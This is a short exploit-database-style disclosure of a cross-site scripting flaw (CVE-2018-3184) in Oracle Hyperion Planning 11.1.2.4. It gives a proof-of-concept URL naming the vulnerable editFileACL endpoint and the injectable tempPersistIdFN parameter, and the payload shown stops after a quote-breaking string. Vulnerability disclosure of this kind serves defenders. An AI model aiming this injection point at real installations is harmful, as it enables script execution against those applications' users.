# Exploit Title: Oracle Hyperion Planning, 11.1.2.4 Vulnerable to Cross Site Scripting # Date: 2018-10-16 # Exploit Author: Hasan Alqawzai # Vendor Homepage: https://www.oracle.com # Software Link: https://www.oracle.com/applications/performance-management/products/financial-close-reporting/hyperion-financial-management/ # Version: 11.1.2.4 # Tested on: Windows # CVE : CVE-2018-3184 # Description : It was detected cross-site scripting , which allows an attacker to execute a dynamic script in the context of the application. # Prerequisites : Access to Oracle Hyperion # PoC Exploit: XSS https://examble.com/raframework/browse/editFileACL?dest=0000016f77a61591-1111-3dfd-c9ao0p1b&tempPersistIdFN=1525";